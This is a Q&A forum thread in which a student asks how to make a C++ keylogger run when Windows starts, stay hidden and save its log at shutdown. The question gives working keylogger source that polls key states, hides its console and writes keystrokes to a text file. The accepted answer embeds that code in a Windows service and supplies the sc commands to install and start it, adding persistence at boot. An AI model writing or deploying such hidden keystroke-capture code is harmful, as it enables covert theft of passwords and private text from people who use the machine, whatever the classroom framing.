# when a windows system turn on. my C++ program should activate? how can I do that?

Tags: visual-c++

** I am a software engineer student. I have to do a presentation about Key-logger program in c++ the three main points are 1- this app should work while the windows system is running. 2- hide the console application. 3- Save the text file automatically before the shutting down the system.** *I have done the second point.*

```
#include <iostream>
#include <windows.h>
#include <fstream>
#define WINDOWS_LEAN_AND_MEAN
using namespace std;
int main() {
    int i;
    char j;
    char count;
    ofstream file("log.txt");
    ofstream acii("acii.txt");
    while (true) {
        ShowWindow(GetConsoleWindow(), SW_HIDE);
        for (i = 8; i <= 255; i++) {
            if (GetAsyncKeyState(i) == -32767) {
                acii << i << " ";
                if (i >= 65 && i <= 90 || i >= 48 && i <= 57) {
                    j = i;
                    file << j;
                }
                else if (i == 16) {
                    file << " [SHIFT] ";
                }
                else if (i == 8) {
                    file << " [BACK_SPACE] ";
                }
                else if (i == 32) {
                    file << " [SPACE] ";
                }
                else if (i == 17) {
                    file << " [CTRL] ";
                }
                else if (i == 13) {
                    file << " [ENTER] ";
                }
                else if (i == 190) {
                    file << " . ";
                }
            }
        }
    }
    return 0;
}
```

Comment: You can develop a Windows Service configured with start automatic. Windows will start it when windows starts. When the service is stoping (manually or because a windows reboot or shutdown), Windows calls your service to do what you need. [Here is an example](https://www.codeproject.com/Articles/499465/Simple-Windows-Service-in-Cplusplus)

Answer (score 0, accepted):

Using the code provides [here](https://www.codeproject.com/Articles/499465/Simple-Windows-Service-in-Cplusplus), shared by SuperG280 in the comments, you would simply insert your keylog code inside the ServiceWorkerThread() function.  Open the files before the while loop, and close them afterwords.  The while loop exits when the service is ended, such as when the computer is shutdown.

```cpp
#include <iostream>
#include <windows.h>
#include <fstream>
#include <tchar.h>
#define WINDOWS_LEAN_AND_MEAN

using namespace std;

SERVICE_STATUS        g_ServiceStatus = { 0 };
SERVICE_STATUS_HANDLE g_StatusHandle = NULL;
HANDLE                g_ServiceStopEvent = INVALID_HANDLE_VALUE;

VOID WINAPI ServiceMain(DWORD argc, LPTSTR* argv);
VOID WINAPI ServiceCtrlHandler(DWORD);
DWORD WINAPI ServiceWorkerThread(LPVOID lpParam);

#define SERVICE_NAME  _T("My Sample Service")

int _tmain(int argc, TCHAR* argv[])
{
    OutputDebugString(_T("My Sample Service: Main: Entry"));

    SERVICE_TABLE_ENTRY ServiceTable[] =
    {
        {SERVICE_NAME, (LPSERVICE_MAIN_FUNCTION)ServiceMain},
        {NULL, NULL}
    };

    if (StartServiceCtrlDispatcher(ServiceTable) == FALSE)
    {
        OutputDebugString(_T("My Sample Service: Main: StartServiceCtrlDispatcher returned error"));
        return GetLastError();
    }

    OutputDebugString(_T("My Sample Service: Main: Exit"));
    return 0;
}

VOID WINAPI ServiceMain(DWORD argc, LPTSTR* argv)
{
    DWORD Status = E_FAIL;

    OutputDebugString(_T("My Sample Service: ServiceMain: Entry"));

    g_StatusHandle = RegisterServiceCtrlHandler(SERVICE_NAME, ServiceCtrlHandler);

    if (g_StatusHandle == NULL)
    {
        OutputDebugString(_T("My Sample Service: ServiceMain: RegisterServiceCtrlHandler returned error"));
        goto EXIT;
    }

    // Tell the service controller we are starting
    ZeroMemory(&g_ServiceStatus, sizeof(g_ServiceStatus));
    g_ServiceStatus.dwServiceType = SERVICE_WIN32_OWN_PROCESS;
    g_ServiceStatus.dwControlsAccepted = 0;
    g_ServiceStatus.dwCurrentState = SERVICE_START_PENDING;
    g_ServiceStatus.dwWin32ExitCode = 0;
    g_ServiceStatus.dwServiceSpecificExitCode = 0;
    g_ServiceStatus.dwCheckPoint = 0;

    if (SetServiceStatus(g_StatusHandle, &g_ServiceStatus) == FALSE)
    {
        OutputDebugString(_T("My Sample Service: ServiceMain: SetServiceStatus returned error"));
    }

    /*
     * Perform tasks neccesary to start the service here
     */
    OutputDebugString(_T("My Sample Service: ServiceMain: Performing Service Start Operations"));

    // Create stop event to wait on later.
    g_ServiceStopEvent = CreateEvent(NULL, TRUE, FALSE, NULL);
    if (g_ServiceStopEvent == NULL)
    {
        OutputDebugString(_T("My Sample Service: ServiceMain: CreateEvent(g_ServiceStopEvent) returned error"));

        g_ServiceStatus.dwControlsAccepted = 0;
        g_ServiceStatus.dwCurrentState = SERVICE_STOPPED;
        g_ServiceStatus.dwWin32ExitCode = GetLastError();
        g_ServiceStatus.dwCheckPoint = 1;

        if (SetServiceStatus(g_StatusHandle, &g_ServiceStatus) == FALSE)
        {
            OutputDebugString(_T("My Sample Service: ServiceMain: SetServiceStatus returned error"));
        }
        goto EXIT;
    }

    // Tell the service controller we are started
    g_ServiceStatus.dwControlsAccepted = SERVICE_ACCEPT_STOP;
    g_ServiceStatus.dwCurrentState = SERVICE_RUNNING;
    g_ServiceStatus.dwWin32ExitCode = 0;
    g_ServiceStatus.dwCheckPoint = 0;

    if (SetServiceStatus(g_StatusHandle, &g_ServiceStatus) == FALSE)
    {
        OutputDebugString(_T("My Sample Service: ServiceMain: SetServiceStatus returned error"));
    }

    // Start the thread that will perform the main task of the service
    HANDLE hThread = CreateThread(NULL, 0, ServiceWorkerThread, NULL, 0, NULL);

    OutputDebugString(_T("My Sample Service: ServiceMain: Waiting for Worker Thread to complete"));

    // Wait until our worker thread exits effectively signaling that the service needs to stop
    WaitForSingleObject(hThread, INFINITE);

    OutputDebugString(_T("My Sample Service: ServiceMain: Worker Thread Stop Event signaled"));

    /*
     * Perform any cleanup tasks
     */
    OutputDebugString(_T("My Sample Service: ServiceMain: Performing Cleanup Operations"));

    CloseHandle(g_ServiceStopEvent);

    g_ServiceStatus.dwControlsAccepted = 0;
    g_ServiceStatus.dwCurrentState = SERVICE_STOPPED;
    g_ServiceStatus.dwWin32ExitCode = 0;
    g_ServiceStatus.dwCheckPoint = 3;

    if (SetServiceStatus(g_StatusHandle, &g_ServiceStatus) == FALSE)
    {
        OutputDebugString(_T("My Sample Service: ServiceMain: SetServiceStatus returned error"));
    }

EXIT:
    OutputDebugString(_T("My Sample Service: ServiceMain: Exit"));

    return;
}

VOID WINAPI ServiceCtrlHandler(DWORD CtrlCode)
{
    OutputDebugString(_T("My Sample Service: ServiceCtrlHandler: Entry"));

    switch (CtrlCode)
    {
    case SERVICE_CONTROL_STOP:

        OutputDebugString(_T("My Sample Service: ServiceCtrlHandler: SERVICE_CONTROL_STOP Request"));

        if (g_ServiceStatus.dwCurrentState != SERVICE_RUNNING)
            break;

        /*
         * Perform tasks neccesary to stop the service here
         */

        g_ServiceStatus.dwControlsAccepted = 0;
        g_ServiceStatus.dwCurrentState = SERVICE_STOP_PENDING;
        g_ServiceStatus.dwWin32ExitCode = 0;
        g_ServiceStatus.dwCheckPoint = 4;

        if (SetServiceStatus(g_StatusHandle, &g_ServiceStatus) == FALSE)
        {
            OutputDebugString(_T("My Sample Service: ServiceCtrlHandler: SetServiceStatus returned error"));
        }

        // This will signal the worker thread to start shutting down
        SetEvent(g_ServiceStopEvent);

        break;

    default:
        break;
    }

    OutputDebugString(_T("My Sample Service: ServiceCtrlHandler: Exit"));
}

DWORD WINAPI ServiceWorkerThread(LPVOID lpParam)
{
    OutputDebugString(_T("My Sample Service: ServiceWorkerThread: Entry"));

    ofstream file("log.txt");
    ofstream acii("acii.txt");

    //  Periodically check if the service has been requested to stop
    while (WaitForSingleObject(g_ServiceStopEvent, 0) != WAIT_OBJECT_0)
    {
        int i;
        char j;

        ShowWindow(GetConsoleWindow(), SW_HIDE);
        for (i = 8; i <= 255; i++) {
            if (GetAsyncKeyState(i) == -32767)
            {
                acii << i << " ";
                if (i >= 65 && i <= 90 || i >= 48 && i <= 57)
                {
                    j = i;
                    file << j;
                }
                else if (i == 16) {
                    file << " [SHIFT] ";
                }
                else if (i == 8) {
                    file << " [BACK_SPACE] ";
                }
                else if (i == 32) {
                    file << " [SPACE] ";
                }
                else if (i == 17) {
                    file << " [CTRL] ";
                }
                else if (i == 13) {
                    file << " [ENTER] ";
                }
                else if (i == 190) {
                    file << " . ";
                }
            }
        }
        Sleep(10);
    }

    file.close();
    acii.close();

    OutputDebugString(_T("My Sample Service: ServiceWorkerThread: Exit"));

    return ERROR_SUCCESS;
}
```

Add the service with:

> sc create "My Sample Service" binPath= C:\SampleService.exe

Start the service with:

> sc start "My Sample Service"

Remove the service with:

> sc delete "My Sample Service"